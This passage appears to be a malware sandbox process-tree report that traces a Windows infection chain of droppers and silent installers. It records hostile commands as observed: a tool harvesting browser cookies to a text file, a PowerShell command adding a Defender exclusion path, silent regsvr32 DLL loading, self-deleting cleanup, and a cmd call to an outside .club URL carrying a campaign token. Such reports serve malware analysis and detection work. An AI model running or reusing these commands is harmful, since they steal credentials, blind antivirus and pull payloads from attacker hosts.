C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"12⤵PID:5624
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"11⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5156
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"11⤵PID:2300
-
-
C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"11⤵PID:4800
-
C:\Users\Admin\AppData\Local\Temp\is-KD887.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KD887.tmp\LabPicV3.tmp" /SL5="$30350,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"12⤵PID:2232
-
C:\Users\Admin\AppData\Local\Temp\is-866LD.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-866LD.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:6096
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"11⤵PID:4980
-
-
C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"11⤵PID:4680
-
-
C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"11⤵PID:2136
-
-
C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"C:\Program Files (x86)\Versium Research\Versium Research\INr0xRwilfeIDzO0jj8ipF07.exe"11⤵PID:4148
-
C:\Users\Admin\Documents\KJdoWPNuV5tno0P4oaMAEHls.exe"C:\Users\Admin\Documents\KJdoWPNuV5tno0P4oaMAEHls.exe"12⤵PID:5276
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\q4qa0lea4d1\vict.exe"C:\Users\Admin\AppData\Local\Temp\q4qa0lea4d1\vict.exe" /VERYSILENT /id=5358⤵PID:4236
-
C:\Users\Admin\AppData\Local\Temp\is-M4UBI.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-M4UBI.tmp\vict.tmp" /SL5="$202C2,870426,780800,C:\Users\Admin\AppData\Local\Temp\q4qa0lea4d1\vict.exe" /VERYSILENT /id=5359⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\is-BNQKV.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-BNQKV.tmp\winhost.exe" 53510⤵PID:4676
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\KguZwqzre.dll"11⤵PID:4968
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\KguZwqzre.dll"12⤵PID:5672
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\KguZwqzre.dll"13⤵PID:5292
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ausguyq53ck\bi1nzzr1gwq.exe"C:\Users\Admin\AppData\Local\Temp\ausguyq53ck\bi1nzzr1gwq.exe" /ustwo INSTALL8⤵PID:2076
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "bi1nzzr1gwq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ausguyq53ck\bi1nzzr1gwq.exe" & exit9⤵PID:5868
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "bi1nzzr1gwq.exe" /f10⤵
- Kills process with taskkill
PID:6064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5skpu50bknr\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\5skpu50bknr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\is-3D89Q.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-3D89Q.tmp\IBInstaller_97039.tmp" /SL5="$302E6,9887378,721408,C:\Users\Admin\AppData\Local\Temp\5skpu50bknr\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:4628
-
-
-
C:\Users\Admin\AppData\Local\Temp\vy4dm2tbniv\snlqirhlnc0.exe"C:\Users\Admin\AppData\Local\Temp\vy4dm2tbniv\snlqirhlnc0.exe" /quiet SILENT=1 AF=7568⤵PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\vfxoy5fu1dy\app.exe"C:\Users\Admin\AppData\Local\Temp\vfxoy5fu1dy\app.exe" /8-238⤵PID:4252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Restless-Moon"9⤵PID:4228
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970397⤵PID:4772
-
-
C:\Users\Admin\AppData\Local\Temp\is-81MNH.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-81MNH.tmp\{app}\chrome_proxy.exe"7⤵PID:5036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6QB6BRU5O2\setups.exe"C:\Users\Admin\AppData\Local\Temp\6QB6BRU5O2\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\is-R4QCF.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-R4QCF.tmp\setups.tmp" /SL5="$400F2,250374,58368,C:\Users\Admin\AppData\Local\Temp\6QB6BRU5O2\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:4640
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4960
-
C:\Users\Admin\AppData\Roaming\C6EF.tmp.exe"C:\Users\Admin\AppData\Roaming\C6EF.tmp.exe"5⤵PID:4636
-
C:\Users\Admin\AppData\Roaming\C6EF.tmp.exe"C:\Users\Admin\AppData\Roaming\C6EF.tmp.exe"6⤵PID:5160
-
-
-
C:\Users\Admin\AppData\Roaming\D7D8.tmp.exe"C:\Users\Admin\AppData\Roaming\D7D8.tmp.exe"5⤵PID:5196
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5424
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:5580
-
C:\ProgramData\2497698.exe"C:\ProgramData\2497698.exe"5⤵PID:5680
-
-
C:\ProgramData\7951623.exe"C:\ProgramData\7951623.exe"5⤵PID:5916
-
-
C:\ProgramData\839772.exe"C:\ProgramData\839772.exe"5⤵PID:6048
-
-
C:\ProgramData\2939488.exe"C:\ProgramData\2939488.exe"5⤵PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:4536
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4180
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4268
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4592
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2364
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3064
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2924
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2292BA54780643CBC8945DCEACC5320A C2⤵PID:5772
-